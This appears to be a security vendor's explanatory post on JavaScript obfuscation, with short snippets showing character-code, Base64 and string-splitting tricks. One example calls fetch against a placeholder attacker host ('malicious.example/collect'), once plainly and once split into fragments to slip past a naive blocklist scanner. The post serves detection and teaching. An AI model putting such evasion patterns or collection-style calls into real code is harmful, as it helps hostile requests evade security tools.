Malware distributors try to disguise their intentions. If a script plainly connects to a known criminal site, anti-malware software has no trouble catching it. For this reason, malicious JavaScript is usually obfuscated: the distributor transforms the code to make it hard for both humans and machines to understand. Machines can still run it without problems, but analyzing it is hard for them. Hard, but not impossible.
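To illustrate why plain code is easy to catch and disguised code is not, here is a minimal sketch of a deliberately naive scanner. The domain `malicious.example`, the `naiveScan` function, and both sample sources are hypothetical and chosen only for illustration; real anti-malware tools are far more sophisticated than a literal string search.

```javascript
// Hypothetical blocklist entry. ".example" is a reserved TLD, so no real site is referenced.
const BLOCKED_DOMAIN = "malicious.example";

// A deliberately naive scanner: flags source text that contains the domain literally.
function naiveScan(source) {
  return source.includes(BLOCKED_DOMAIN);
}

// The same request, written plainly and with the domain split into fragments.
const plainSource = 'fetch("https://malicious.example/collect");';
const obfuscatedSource =
  'fetch("https://" + ["mali", "cious", ".exa", "mple"].join("") + "/collect");';

console.log(naiveScan(plainSource));      // true
console.log(naiveScan(obfuscatedSource)); // false
```

Both sources would contact the same address when run, but only the plain one contains the text the scanner is looking for.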
Obfuscation falls into several categories:
- Semantic obfuscation uses meaningless names for functions and variables. The code runs the same whether a variable is called "Filename" or "x80," but the latter makes it harder to tell what it's doing.
- Convoluted code structures, such as excessively complicated tests and illogical factoring, likewise impede understanding. They also make the code more prone to bugs.
- Encoding tricks make the code virtually unreadable. They include building strings from decimal character codes, encoding strings in Base64, and splitting strings into fragments that are joined at run time. Some code uses custom obfuscation and de-obfuscation functions.
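The encoding tricks in the last category can be sketched with a harmless string. In the example below, the word "example" stands in for whatever a real script would hide (a URL, a function name), and the helper `decodeBase64` is an assumed convenience wrapper so that the snippet runs in both browsers and Node.js.

```javascript
// Base64 decoder that works in browsers (atob) and in Node.js (Buffer).
const decodeBase64 = (s) =>
  typeof atob === "function" ? atob(s) : Buffer.from(s, "base64").toString("latin1");

// 1. Built from decimal character codes.
const fromCharCodes = String.fromCharCode(101, 120, 97, 109, 112, 108, 101);

// 2. Stored as Base64 and decoded at run time.
const fromBase64 = decodeBase64("ZXhhbXBsZQ==");

// 3. Split into fragments and joined at run time.
const fromFragments = ["ex", "am", "ple"].join("");

console.log(fromCharCodes, fromBase64, fromFragments); // example example example
```

None of the three source forms contains the word "example" literally, yet each produces it when the code runs. Real samples often stack several of these tricks on top of one another.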
Obfuscation isn't the same as minification. Minifying code uses some of the same techniques, but its goal is to make the code as small as possible so that it loads faster. "Beautifying" tools make minified code more readable, though it's likely to have short, meaningless function and variable names even after beautifying. Minified code is usually legitimate.
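As a rough illustration of the difference, the sketch below shows a small function next to a hand-minified equivalent. The function `totalPrice` and its minified form `t` are hypothetical; an actual minifier may produce different output.

```javascript
// Readable original (hypothetical helper).
function totalPrice(unitPrice, quantity) {
  const subtotal = unitPrice * quantity;
  return subtotal;
}

// Hand-minified equivalent: names shortened and whitespace removed, nothing hidden.
function t(a,b){return a*b}

console.log(totalPrice(3, 4), t(3, 4)); // 12 12
```

The minified version is harder to read, but its logic and any strings it uses remain in plain view, which is why beautifying it recovers most of the structure.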
We have found that many site owners insist their site isn't infected, even after ThreatSign determines that it is. They assume the result is a false positive. However, when we analyzed these sites manually, we found that they were in fact infected. The malicious code was in an unreadable form that made the problem hard to spot.
Obfuscated malicious JavaScript isn't easy to detect, and it's even harder to understand.